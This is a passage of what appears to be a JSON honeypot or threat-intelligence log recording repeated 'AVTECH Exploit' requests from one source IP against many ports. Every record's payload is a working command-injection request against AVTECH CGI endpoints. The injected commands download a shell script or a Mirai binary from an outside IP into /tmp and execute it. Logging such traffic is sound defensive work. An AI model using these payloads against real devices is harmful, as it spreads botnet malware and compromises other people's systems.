4790.       "user_agent": "Snickers-Avtech",
4791.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4792.       "post_data": "",
4793.       "target_port": 6511,
4794.       "protocol": "tcp",
4795.       "tags": [
4796.         {
4797.           "cve": "",
4798.           "category": "IoT",
4799.           "description": "AVTECH Exploit"
4800.         }
4801.       ],
4802.       "event_count": 2,
4803.       "first_seen": "2020-06-01T05:02:47Z",
4804.       "last_seen": "2020-06-01T05:03:46Z"
4805.     },
4806.     {
4807.       "event_id": "20ef211dfbbec46788636c345cd8a6fbb93f39f811b961881022de3005f02af0",
4808.       "source_ip_address": "193.142.146.34",
4809.       "country": "NL",
4810.       "user_agent": "Snickers-Avtech",
4811.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
4812.       "post_data": "",
4813.       "target_port": 443,
4814.       "protocol": "tcp",
4815.       "tags": [
4816.         {
4817.           "cve": "",
4818.           "category": "IoT",
4819.           "description": "AVTECH Exploit"
4820.         }
4821.       ],
4822.       "event_count": 1,
4823.       "first_seen": "2020-06-01T04:57:23Z",
4824.       "last_seen": "2020-06-01T04:57:23Z"
4825.     },
4826.     {
4827.       "event_id": "4e5e0d5b06f29b9f55921c1b96015767411498e732f3590e9878c1dc7ce1a7cd",
4828.       "source_ip_address": "193.142.146.34",
4829.       "country": "NL",
4830.       "user_agent": "Snickers-Avtech",
4831.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
4832.       "post_data": "",
4833.       "target_port": 9002,
4834.       "protocol": "tcp",
4835.       "tags": [
4836.         {
4837.           "cve": "",
4838.           "category": "IoT",
4839.           "description": "AVTECH Exploit"
4840.         }
4841.       ],
4842.       "event_count": 1,
4843.       "first_seen": "2020-06-01T04:57:14Z",
4844.       "last_seen": "2020-06-01T04:57:14Z"
4845.     },
4846.     {
4847.       "event_id": "ba2a8de3d4ffe6f8406b0f656b7395f1b3c1884af46e3853e69d51ab881d0717",
4848.       "source_ip_address": "193.142.146.34",
4849.       "country": "NL",
4850.       "user_agent": "Snickers-Avtech",
4851.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
4852.       "post_data": "",
4853.       "target_port": 8888,
4854.       "protocol": "tcp",
4855.       "tags": [
4856.         {
4857.           "cve": "",
4858.           "category": "IoT",
4859.           "description": "AVTECH Exploit"
4860.         }
4861.       ],
4862.       "event_count": 1,
4863.       "first_seen": "2020-06-01T04:55:17Z",
4864.       "last_seen": "2020-06-01T04:55:17Z"
4865.     },
4866.     {
4867.       "event_id": "3a092d57233029d93ae41375a6418949f2af10ce50591e3cf14fec67d21d1b45",
4868.       "source_ip_address": "193.142.146.34",
4869.       "country": "NL",
4870.       "user_agent": "Snickers-Avtech",
4871.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
4872.       "post_data": "",
4873.       "target_port": 16993,
4874.       "protocol": "tcp",
4875.       "tags": [
4876.         {
4877.           "cve": "",
4878.           "category": "IoT",
4879.           "description": "AVTECH Exploit"
4880.         }
4881.       ],
4882.       "event_count": 1,
4883.       "first_seen": "2020-06-01T04:55:09Z",
4884.       "last_seen": "2020-06-01T04:55:09Z"
4885.     },
4886.     {
4887.       "event_id": "0089f2e08919f304a84cb8868762eaacd5436096d299671f78ebd19a9da59cf2",
4888.       "source_ip_address": "193.142.146.34",
4889.       "country": "NL",
4890.       "user_agent": "Snickers-Avtech",
4891.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
4892.       "post_data": "",
4893.       "target_port": 10443,
4894.       "protocol": "tcp",
4895.       "tags": [
4896.         {
4897.           "cve": "",
4898.           "category": "IoT",
4899.           "description": "AVTECH Exploit"
4900.         }
4901.       ],
4902.       "event_count": 1,
4903.       "first_seen": "2020-06-01T04:55:02Z",
4904.       "last_seen": "2020-06-01T04:55:02Z"
4905.     },
4906.     {
4907.       "event_id": "e5db591f234a90c37b65a8dffe3082357a8592ccd5506d9fc5ca285cb080313d",
4908.       "source_ip_address": "193.142.146.34",
4909.       "country": "NL",
4910.       "user_agent": "Snickers-Avtech",
4911.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
4912.       "post_data": "",
4913.       "target_port": 7547,
4914.       "protocol": "tcp",
4915.       "tags": [
4916.         {
4917.           "cve": "",
4918.           "category": "IoT",
4919.           "description": "AVTECH Exploit"
4920.         }
4921.       ],
4922.       "event_count": 1,
4923.       "first_seen": "2020-06-01T04:54:55Z",
4924.       "last_seen": "2020-06-01T04:54:55Z"
4925.     },
4926.     {
4927.       "event_id": "14bf2a7882c4d40be94795792f6c62d3c9801fdc54c730dc4df6b6f0f395490d",
4928.       "source_ip_address": "193.142.146.34",
4929.       "country": "NL",
4930.       "user_agent": "Snickers-Avtech",
4931.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
4932.       "post_data": "",
4933.       "target_port": 9001,
4934.       "protocol": "tcp",
4935.       "tags": [
4936.         {
4937.           "cve": "",
4938.           "category": "IoT",
4939.           "description": "AVTECH Exploit"
4940.         }
4941.       ],
4942.       "event_count": 1,
4943.       "first_seen": "2020-06-01T04:54:24Z",
4944.       "last_seen": "2020-06-01T04:54:24Z"
4945.     },
4946.     {
4947.       "event_id": "4997fe885e3ec2dca79a04089412a0b96d435a8976c1d113d112e3adcb846cd3",
4948.       "source_ip_address": "193.142.146.34",
4949.       "country": "NL",
4950.       "user_agent": "Snickers-Avtech",
4951.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
4952.       "post_data": "",
4953.       "target_port": 9200,
4954.       "protocol": "tcp",
4955.       "tags": [
4956.         {
4957.           "cve": "",
4958.           "category": "IoT",
4959.           "description": "AVTECH Exploit"
4960.         }
4961.       ],
4962.       "event_count": 1,
4963.       "first_seen": "2020-06-01T04:54:16Z",
4964.       "last_seen": "2020-06-01T04:54:16Z"
4965.     },
4966.     {
4967.       "event_id": "5bd3d265eae36b6c7d3b81d0bc7e38cb0558f4a42b9cf5c3576283bdf8467df8",
4968.       "source_ip_address": "193.142.146.34",
4969.       "country": "NL",
4970.       "user_agent": "Snickers-Avtech",
4971.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
4972.       "post_data": "",
4973.       "target_port": 5001,
4974.       "protocol": "tcp",
4975.       "tags": [
4976.         {
4977.           "cve": "",
4978.           "category": "IoT",
4979.           "description": "AVTECH Exploit"
4980.         }
4981.       ],
4982.       "event_count": 2,
4983.       "first_seen": "2020-06-01T04:45:36Z",
4984.       "last_seen": "2020-06-01T04:49:53Z"
4985.     },
4986.     {
4987.       "event_id": "7f3d4dd658b13ed7fbda959b3fd61b09d20d7b02b47d384958f8a46fe3a3a365",
4988.       "source_ip_address": "193.142.146.34",
4989.       "country": "NL",
4990.       "user_agent": "Snickers-Avtech",
4991.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
4992.       "post_data": "",
4993.       "target_port": 8082,
4994.       "protocol": "tcp",
4995.       "tags": [
4996.         {
4997.           "cve": "",
4998.           "category": "IoT",
4999.           "description": "AVTECH Exploit"
5000.         }
5001.       ],
5002.       "event_count": 1,
5003.       "first_seen": "2020-06-01T04:49:46Z",
5004.       "last_seen": "2020-06-01T04:49:46Z"
5005.     },
5006.     {
5007.       "event_id": "96b27c9817d2aa059a4974fbf9e7df9ab2ef0afe6ae6eee3f09fa849ca2b9054",
5008.       "source_ip_address": "193.142.146.34",
5009.       "country": "NL",
5010.       "user_agent": "Snickers-Avtech",
5011.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
5012.       "post_data": "",
5013.       "target_port": 8081,
5014.       "protocol": "tcp",
5015.       "tags": [
5016.         {
5017.           "cve": "",
5018.           "category": "IoT",
5019.           "description": "AVTECH Exploit"
5020.         }
5021.       ],
5022.       "event_count": 1,
5023.       "first_seen": "2020-06-01T04:48:54Z",
5024.       "last_seen": "2020-06-01T04:48:54Z"
5025.     },
5026.     {
5027.       "event_id": "f5e3094f0d2511f38bdf5282f389b344d52f1a7f5b14d635d7deed695b0612fa",
5028.       "source_ip_address": "193.142.146.34",
5029.       "country": "NL",
5030.       "user_agent": "Snickers-Avtech",
5031.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
5032.       "post_data": "",
5033.       "target_port": 50000,
5034.       "protocol": "tcp",
5035.       "tags": [
5036.         {
5037.           "cve": "",
5038.           "category": "IoT",
5039.           "description": "AVTECH Exploit"
5040.         }
5041.       ],
5042.       "event_count": 1,
5043.       "first_seen": "2020-06-01T04:48:33Z",
5044.       "last_seen": "2020-06-01T04:48:33Z"
5045.     },
5046.     {
5047.       "event_id": "6365b203e30ca8215d3e6a63c038a472e9ed621873a9aed30524aaa4fbe69ba5",
5048.       "source_ip_address": "193.142.146.34",
5049.       "country": "NL",
5050.       "user_agent": "Snickers-Avtech",
5051.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
5052.       "post_data": "",
5053.       "target_port": 8080,
5054.       "protocol": "tcp",
5055.       "tags": [
5056.         {
5057.           "cve": "",
5058.           "category": "IoT",
5059.           "description": "AVTECH Exploit"
5060.         }
5061.       ],
5062.       "event_count": 1,
5063.       "first_seen": "2020-06-01T04:48:29Z",
5064.       "last_seen": "2020-06-01T04:48:29Z"
5065.     },
5066.     {
5067.       "event_id": "4db7de3421c9914fcb39362c4dbf29c249760baed4ee315048d78c9939e821c8",
5068.       "source_ip_address": "193.142.146.34",
5069.       "country": "NL",
5070.       "user_agent": "Snickers-Avtech",
5071.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
5072.       "post_data": "",
5073.       "target_port": 8181,
5074.       "protocol": "tcp",
5075.       "tags": [
5076.         {
5077.           "cve": "",
5078.           "category": "IoT",
5079.           "description": "AVTECH Exploit"
5080.         }
5081.       ],
5082.       "event_count": 1,
5083.       "first_seen": "2020-06-01T04:48:23Z",
5084.       "last_seen": "2020-06-01T04:48:23Z"
5085.     },
5086.     {
5087.       "event_id": "a94fc31fed6a00d1527de1a5679e848ad820213ad23921876e92069aee5ab133",
5088.       "source_ip_address": "193.142.146.34",
5089.       "country": "NL",
5090.       "user_agent": "Snickers-Avtech",
5091.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
5092.       "post_data": "",
5093.       "target_port": 2083,
5094.       "protocol": "tcp",
5095.       "tags": [
5096.         {
5097.           "cve": "",
5098.           "category": "IoT",
5099.           "description": "AVTECH Exploit"
5100.         }
5101.       ],
5102.       "event_count": 1,
5103.       "first_seen": "2020-06-01T04:47:54Z",
5104.       "last_seen": "2020-06-01T04:47:54Z"
5105.     },
5106.     {
5107.       "event_id": "53dd23f7f36d7f0a690ced7af968eedc351e050cb42a6f2b16182abc5118dc5d",
5108.       "source_ip_address": "193.142.146.34",
5109.       "country": "NL",
5110.       "user_agent": "Snickers-Avtech",
5111.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
5112.       "post_data": "",
5113.       "target_port": 3389,
5114.       "protocol": "tcp",
5115.       "tags": [
5116.         {
5117.           "cve": "",
5118.           "category": "IoT",
5119.           "description": "AVTECH Exploit"
5120.         }
5121.       ],
5122.       "event_count": 1,
5123.       "first_seen": "2020-06-01T04:47:28Z",
5124.       "last_seen": "2020-06-01T04:47:28Z"
5125.     },
5126.     {
5127.       "event_id": "43e2a90630378dcab1d89dd1099a0017086b729053a3dc6088f35139673cbc7c",
5128.       "source_ip_address": "193.142.146.34",
5129.       "country": "NL",
5130.       "user_agent": "Snickers-Avtech",
5131.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
5132.       "post_data": "",
5133.       "target_port": 8089,
5134.       "protocol": "tcp",
5135.       "tags": [
5136.         {
5137.           "cve": "",
5138.           "category": "IoT",
5139.           "description": "AVTECH Exploit"
5140.         }
5141.       ],
5142.       "event_count": 1,
5143.       "first_seen": "2020-06-01T04:46:42Z",
5144.       "last_seen": "2020-06-01T04:46:42Z"
5145.     },
5146.     {
5147.       "event_id": "267c6bdc212f002fa5c33597c7d36fee9ffda6e313e526146867c1d76a1e7a57",
5148.       "source_ip_address": "193.142.146.34",
5149.       "country": "NL",
5150.       "user_agent": "Snickers-Avtech",
5151.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
5152.       "post_data": "",
5153.       "target_port": 52869,
5154.       "protocol": "tcp",
5155.       "tags": [
5156.         {
5157.           "cve": "",
5158.           "category": "IoT",
5159.           "description": "AVTECH Exploit"
5160.         }
5161.       ],
5162.       "event_count": 1,
5163.       "first_seen": "2020-06-01T04:46:29Z",
5164.       "last_seen": "2020-06-01T04:46:29Z"
5165.     },
5166.     {
5167.       "event_id": "c9fee0169b72bff0a44029130581230bfbfc308091f02ad1af0412c73ecf0b9f",
5168.       "source_ip_address": "193.142.146.34",
5169.       "country": "NL",
5170.       "user_agent": "Snickers-Avtech",
5171.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
5172.       "post_data": "",
5173.       "target_port": 2087,
5174.       "protocol": "tcp",
5175.       "tags": [
5176.         {
5177.           "cve": "",
5178.           "category": "IoT",
5179.           "description": "AVTECH Exploit"
5180.         }
5181.       ],
5182.       "event_count": 1,
5183.       "first_seen": "2020-06-01T04:46:26Z",
5184.       "last_seen": "2020-06-01T04:46:26Z"
5185.     },
5186.     {
5187.       "event_id": "eb9278bf1072775efd7d9924c7c563250cbee2a7b1ca3c050202d674502888c4",
5188.       "source_ip_address": "193.142.146.34",
5189.       "country": "NL",
5190.       "user_agent": "Snickers-Avtech",
5191.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
5192.       "post_data": "",
5193.       "target_port": 2375,
5194.       "protocol": "tcp",
5195.       "tags": [
5196.         {
5197.           "cve": "",
5198.           "category": "IoT",
5199.           "description": "AVTECH Exploit"
5200.         }
5201.       ],
5202.       "event_count": 1,
5203.       "first_seen": "2020-06-01T04:46:17Z",
5204.       "last_seen": "2020-06-01T04:46:17Z"
5205.     },
5206.     {
5207.       "event_id": "23b7bc731b876a0c87000bd4ef70c9e9e63eb15b54c9047da93d9638bd82fb1e",
5208.       "source_ip_address": "193.142.146.34",
5209.       "country": "NL",
5210.       "user_agent": "Snickers-Avtech",
5211.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
5212.       "post_data": "",
5213.       "target_port": 8008,
5214.       "protocol": "tcp",
5215.       "tags": [
5216.         {
5217.           "cve": "",
5218.           "category": "IoT",
5219.           "description": "AVTECH Exploit"
5220.         }
5221.       ],
5222.       "event_count": 1,
5223.       "first_seen": "2020-06-01T04:46:06Z",
5224.       "last_seen": "2020-06-01T04:46:06Z"
5225.     },
5226.     {
5227.       "event_id": "336f2b9b9b86e508f11fffc78d70193f76a45cd0a43bbdf4a6122081cab18f62",
5228.       "source_ip_address": "193.142.146.34",
5229.       "country": "NL",
5230.       "user_agent": "Snickers-Avtech",
5231.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh ; echo snickers_was_here HTTP/1.1",
5232.       "post_data": "",
5233.       "target_port": 8443,
5234.       "protocol": "tcp",
5235.       "tags": [
5236.         {
5237.           "cve": "",
5238.           "category": "IoT",
5239.           "description": "AVTECH Exploit"
5240.         }
5241.       ],
5242.       "event_count": 1,
5243.       "first_seen": "2020-06-01T04:45:45Z",
5244.       "last_seen": "2020-06-01T04:45:45Z"
5245.     },
5246.     {
5247.       "event_id": "f2103f0d9e562a99204891158486281d1533118e479c8bc5cb9b12dfd94db500",
5248.       "source_ip_address": "193.142.146.34",
5249.       "country": "NL",
5250.       "user_agent": "Snickers-Avtech",
5251.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh ; echo snickers_was_here HTTP/1.1",
5252.       "post_data": "",
5253.       "target_port": 5001,
5254.       "protocol": "tcp",
5255.       "tags": [
5256.         {
5257.           "cve": "",
5258.           "category": "IoT",
5259.           "description": "AVTECH Exploit"
5260.         }
5261.       ],
5262.       "event_count": 1,
5263.       "first_seen": "2020-06-01T04:45:44Z",
5264.       "last_seen": "2020-06-01T04:45:44Z"
5265.     },
5266.     {
5267.       "event_id": "fc4f47bd80535f88aa481a4948641d34e01ac17dad04f6c39c3f65b2f65466fc",
5268.       "source_ip_address": "193.142.146.34",
5269.       "country": "NL",
5270.       "user_agent": "Snickers-Avtech",
5271.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
5272.       "post_data": "",
5273.       "target_port": 8443,
5274.       "protocol": "tcp",
5275.       "tags": [
5276.         {
5277.           "cve": "",
5278.           "category": "IoT",
5279.           "description": "AVTECH Exploit"
5280.         }
5281.       ],
5282.       "event_count": 1,
5283.       "first_seen": "2020-06-01T04:45:38Z",
5284.       "last_seen": "2020-06-01T04:45:38Z"
5285.     },
5286.     {
5287.       "event_id": "81b902f1d292921f4bddee716132e9dc1b934e495e45868ba54e424f1951f647",
5288.       "source_ip_address": "193.142.146.34",
5289.       "country": "NL",
5290.       "user_agent": "Snickers-Avtech",
5291.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5292.       "post_data": "",
5293.       "target_port": 8008,
5294.       "protocol": "tcp",
5295.       "tags": [
5296.         {
5297.           "cve": "",
5298.           "category": "IoT",
5299.           "description": "AVTECH Exploit"
5300.         }
5301.       ],
5302.       "event_count": 3,
5303.       "first_seen": "2020-06-01T04:33:22Z",
5304.       "last_seen": "2020-06-01T04:43:48Z"
5305.     },
5306.     {
5307.       "event_id": "84341cf107ca5f661489d66a09eae88ed0cdee84746ac8994b6c02d104f94a37",
5308.       "source_ip_address": "193.142.146.34",
5309.       "country": "NL",
5310.       "user_agent": "Snickers-Avtech",
5311.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5312.       "post_data": "",
5313.       "target_port": 4567,
5314.       "protocol": "tcp",
5315.       "tags": [
5316.         {
5317.           "cve": "",
5318.           "category": "IoT",
5319.           "description": "AVTECH Exploit"
5320.         }
5321.       ],
5322.       "event_count": 1,
5323.       "first_seen": "2020-06-01T04:43:44Z",
5324.       "last_seen": "2020-06-01T04:43:44Z"
5325.     },
5326.     {
5327.       "event_id": "54e39f4a853ae442af233e14623d00fd23d94e5ce0cc805825e49ae0625942bc",
5328.       "source_ip_address": "193.142.146.34",
5329.       "country": "NL",
5330.       "user_agent": "Snickers-Avtech",
5331.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5332.       "post_data": "",
5333.       "target_port": 88,
5334.       "protocol": "tcp",
5335.       "tags": [
5336.         {
5337.           "cve": "",
5338.           "category": "IoT",
5339.           "description": "AVTECH Exploit"
5340.         }
5341.       ],
5342.       "event_count": 3,
5343.       "first_seen": "2020-06-01T04:34:54Z",
5344.       "last_seen": "2020-06-01T04:43:36Z"
5345.     },
5346.     {
5347.       "event_id": "b5cad8068a0bacab36c0340da886d0c2d4330de1d6f54b9b0e8367557d04e46b",
5348.       "source_ip_address": "193.142.146.34",
5349.       "country": "NL",
5350.       "user_agent": "Snickers-Avtech",
5351.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5352.       "post_data": "",
5353.       "target_port": 16992,
5354.       "protocol": "tcp",
5355.       "tags": [
5356.         {
5357.           "cve": "",
5358.           "category": "IoT",
5359.           "description": "AVTECH Exploit"
5360.         }
5361.       ],
5362.       "event_count": 3,
5363.       "first_seen": "2020-06-01T04:34:06Z",
5364.       "last_seen": "2020-06-01T04:42:41Z"
5365.     },
5366.     {
5367.       "event_id": "66bf218ce87b8f49d255d041f0a7294c86a4e02215d7d9a4938a28da87d8a9ff",
5368.       "source_ip_address": "193.142.146.34",
5369.       "country": "NL",
5370.       "user_agent": "Snickers-Avtech",
5371.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5372.       "post_data": "",
5373.       "target_port": 9090,
5374.       "protocol": "tcp",
5375.       "tags": [
5376.         {
5377.           "cve": "",
5378.           "category": "IoT",
5379.           "description": "AVTECH Exploit"
5380.         }
5381.       ],
5382.       "event_count": 1,
5383.       "first_seen": "2020-06-01T04:42:19Z",
5384.       "last_seen": "2020-06-01T04:42:19Z"
5385.     },
5386.     {
5387.       "event_id": "019a678a5f2548b375e04d61a44f372469ffa752ac81e1faa79a044efc9d7387",
5388.       "source_ip_address": "193.142.146.34",
5389.       "country": "NL",
5390.       "user_agent": "Snickers-Avtech",
5391.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5392.       "post_data": "",
5393.       "target_port": 80,
5394.       "protocol": "tcp",
5395.       "tags": [
5396.         {
5397.           "cve": "",
5398.           "category": "IoT",
5399.           "description": "AVTECH Exploit"
5400.         }
5401.       ],
5402.       "event_count": 1,
5403.       "first_seen": "2020-06-01T04:42:17Z",
5404.       "last_seen": "2020-06-01T04:42:17Z"
5405.     },
5406.     {
5407.       "event_id": "dae728760ee9754fa1b36818f53d921a42ba4c1a9fc07fd3230fa2be68f158f2",
5408.       "source_ip_address": "193.142.146.34",
5409.       "country": "NL",
5410.       "user_agent": "Snickers-Avtech",
5411.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
5412.       "post_data": "",
5413.       "target_port": 9100,
5414.       "protocol": "tcp",
5415.       "tags": [
5416.         {
5417.           "cve": "",
5418.           "category": "IoT",
5419.           "description": "AVTECH Exploit"
5420.         }
5421.       ],
5422.       "event_count": 1,
5423.       "first_seen": "2020-06-01T04:42:17Z",
5424.       "last_seen": "2020-06-01T04:42:17Z"
5425.     },
5426.     {
5427.       "event_id": "1961dbc575e9ddd1b6f4ae05551f06d3f3ab59f4920ea34182acfcc62861ae42",
5428.       "source_ip_address": "193.142.146.34",
5429.       "country": "NL",
5430.       "user_agent": "Snickers-Avtech",
